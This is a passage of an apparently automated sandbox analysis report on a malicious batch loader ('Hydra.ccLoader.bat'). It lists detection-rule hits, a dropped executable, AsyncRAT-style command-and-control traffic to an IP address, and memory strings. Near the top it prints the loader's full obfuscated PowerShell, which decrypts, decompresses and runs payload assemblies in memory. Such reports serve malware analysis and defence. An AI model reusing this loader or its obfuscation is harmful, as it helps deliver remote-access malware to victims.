$vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($jKyNf, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$iUuMH);'.Replace('*', ''); Invoke-Expression '$nGmNE=$VDuEP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$nGmNE.*I*n*v*o*k*e*($null, $wjUzC);'.Replace('*', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] ('')); , CommandLine: cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$iUuMH);'.Replace('*', ''); Invoke-Expression '$yWDGv=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$RiWlb=New-Obj
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4412, TargetFilename: C:\Windows\$nya-onimai2\MzWhoQ.exe
Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\System32\svchost.exe, QueryName: ipwho.is
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 6140, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6008, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 2344, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-12T18:02:48.092535+010020355951Domain Observed Used for C2 Detected135.125.21.874782192.168.2.749816TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.2% probability
Source: C:\Windows\$nya-onimai2\MzWhoQ.exeJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000019.00000000.1605681688.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2743193861.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000019.00000000.1605782622.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.2746077873.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000019.00000002.2744550027.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000019.00000000.1605732217.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D1ED894 FindFirstFileExW,8_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D21D894 FindFirstFileExW,8_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000001CA7D29D894 FindFirstFileExW,8_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5D894 FindFirstFileExW,9_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD8D894 FindFirstFileExW,9_2_0000017D2DD8D894
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000022F4B92D894 FindFirstFileExW,12_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1C9D894 FindFirstFileExW,14_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1D0D894 FindFirstFileExW,14_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1DFD894 FindFirstFileExW,14_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115C7D894 FindFirstFileExW,15_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exeCode function: 15_2_000001C115CAD894 FindFirstFileExW,15_2_000001C115CAD894
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exeCode function: 16_2_000001BB497FD894 FindFirstFileExW,16_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000023942B1D894 FindFirstFileExW,19_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13D894 FindFirstFileExW,20_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16D894 FindFirstFileExW,20_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 20_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DD894 FindFirstFileExW,21_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570D894 FindFirstFileExW,21_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7D894 FindFirstFileExW,22_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exeCode function: 22_2_000002287AD7DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9D894 FindFirstFileExW,23_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_000002520257D894 FindFirstFileExW,24_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000252025AD894 FindFirstFileExW,24_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EBFCD894 FindFirstFileExW,25_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68D894 FindFirstFileExW,25_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 25_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_000001A9EC68DA18

Networking

barindex
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 135.125.21.87:4782 -> 192.168.2.7:49816
Source: C:\Windows\System32\svchost.exeDomain query: ipwho.is
Source: global trafficTCP traffic: 192.168.2.7:49816 -> 135.125.21.87:4782
Source: Joe Sandbox ViewASN Name: AVAYAUS AVAYAUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: C:\Windows\System32\svchost.exeDNS query: name: ipwho.is
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownTCP traffic detected without corresponding DNS query: 135.125.21.87
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 00000014.00000002.2863482747.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 0000002F.00000000.1743050466.000002C939E2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1743200376.000002C939E52000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000002F.00000000.1743397090.000002C939E84000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: lsass.exe, 00000009.00000002.2781167454.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498848284.0000017D2D493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000009.00000000.1498548674.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2772012264.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2860002740.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582220409.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582396161.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.35.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000014.00000000.1582773647.000002234AEAD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmp, 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.20.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 00000014.00000000.1583626669.000002234B506000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582220409.000002234AE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2861654751.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582396161.000002234AE40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582299573.000002234AE34000.00000004.00000001.00020000.00000000.sdmp, FB0D848F74F70BB2EAA93746D24D97490.20.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab
Source: svchost.exe, 00000014.00000000.1583032983.000002234AEF1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1582717398.000002234AE8A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?645b70e1261b8
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000009.00000000.1498297311.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2760720097.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000009.00000000.1498267175.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2758828971.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000014.00000000.1583032983.000002234AEE6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uN
Source: lsass.exe, 00000009.00000002.2777013657.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498897407.0000017D2D551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000003.1886654713.0000017D2D572000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2785610935.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498753633.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000009.00000000.1498792506.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1498548674.0000017D2D442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
